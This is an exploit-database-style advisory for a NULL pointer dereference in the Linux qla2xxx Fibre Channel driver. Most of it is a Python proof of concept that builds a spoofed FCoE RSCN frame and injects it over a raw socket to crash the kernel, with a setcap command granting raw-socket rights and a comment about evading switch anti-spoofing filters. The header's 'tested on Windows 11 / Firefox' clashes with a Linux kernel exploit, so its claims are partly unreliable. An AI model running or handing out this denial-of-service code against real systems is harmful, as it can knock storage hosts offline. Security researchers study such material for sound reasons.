=============================================================================================================================================
| # Title     : Linux qla2xxx NULL Pointer Dereference During Fabric Async Scan                                                             |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://kernel.org                                                                                                          |
=============================================================================================================================================

[+] Summary    :  CVE-2025-71236 is a kernel vulnerability in the Linux qla2xxx Fibre Channel driver where a missing NULL pointer validation in qla_fab_async_scan() could lead to a kernel crash.
                  During asynchronous fabric events such as RSCN updates or NVMe-FC activity, an internal structure pointer (sp) could become NULL or invalid but still be dereferenced. 
                  This results in a NULL pointer dereference and a kernel panic, causing a denial of service.
                  The issue is resolved by validating the pointer before freeing or accessing associated memory, preventing the crash during fabric scanning operations.


[+] POC   :   sudo setcap cap_net_raw+ep /usr/bin/python3


#!/usr/bin/env python3
import socket
import struct
import sys
import fcntl

class QLA2XXX_Context_Architect:
    def __init__(self, interface="eth0", vlan_id=1002):
        self.interface = interface
        self.vlan_id = vlan_id
        self.ETH_P_FCOE = 0x8906
        self.FCOE_DEST_MAC = b'\x01\x10\x18\x01\x00\x02' 
        self.src_mac = self._get_mac_address()

    def _get_mac_address(self):
        """Fetches the real MAC address of the interface to bypass Switch Anti-Spoofing filters."""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

            info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', bytes(self.interface, 'utf-8')[:15]))
            return info[18:24]
        except Exception:
            return b'\x00\x11\x22\x33\x44\x55'  

    def crc32c_reflected(self, data):
        """Calculates CRC-32C (Castagnoli) with full Bit-reflection - Strict FC Standard."""
        crc = 0xFFFFFFFF
        for byte in data:
            crc ^= byte
            for _ in range(8):

                crc = (crc >> 1) ^ (0x82F63B78 if crc & 1 else 0)
        return crc ^ 0xFFFFFFFF

    def craft_context_frame(self):

        tci = (3 << 13) | (0 << 12) | (self.vlan_id & 0xFFF)
        eth_header = struct.pack("!6s6sH", self.FCOE_DEST_MAC, self.src_mac, 0x8100)
        vlan_tag   = struct.pack("!H", tci)
        eth_type   = struct.pack("!H", self.ETH_P_FCOE)
        l2_hdr     = eth_header + vlan_tag + eth_type
        fcoe_header = struct.pack('!BBB', 0x00, 0x00, 0x2e) + b'\x00' * 11
        fc_header = (
            b'\x02' +                    
            b'\xff\xff\xfe' +             
            b'\x00' +                     
            b'\x01\x02\x03' +             
            b'\x01' +                  
            b'\x29\x00\x00' +             
            b'\x01' +                    
            b'\x00' +                     
            struct.pack('>H', 0x0000) +   
            struct.pack('>H', 0x03E8) +   
            struct.pack('>H', 0xFFFF) +   
            struct.pack('>I', 0x00000000) 
        )

        rscn_payload = struct.pack('!BBH', 0x61, 0x00, 0x0008) + \
                       struct.pack('!B3s', 0x02, b'\x01\x02\x03')

        fc_block = fc_header + rscn_payload
        crc = struct.pack('<I', self.crc32c_reflected(fc_block))
        fcoe_eof = struct.pack('!B3x', 0x41) 

        return l2_hdr + fcoe_header + fc_block + crc + fcoe_eof

    def inject(self):
        print(f"[*] Pre-req: sudo ethtool -K {self.interface} tx-vlan-offload off")
        try:
         
            sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
            sock.bind((self.interface, 0))
            frame = self.craft_context_frame()
            
            print(f"[*] Sending Structurally Correct Frame (Len: {len(frame)} bytes)")
            print(f"[*] S_ID: 0x010203 | OX_ID: 0x03E8 | Class: 3 (SOFi3)")
            
            sock.send(frame)
            print("[+] Frame Injected Successfully.")
        except PermissionError:
            print("[-] Error: Root privileges required for raw socket injection.")
        except Exception as e:
            print(f"[-] Error: {e}")

if __name__ == "__main__":
 
    target_iface = sys.argv[1] if len(sys.argv) > 1 else "eth0"
    app = QLA2XXX_Context_Architect(interface=target_iface)
    app.inject()
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================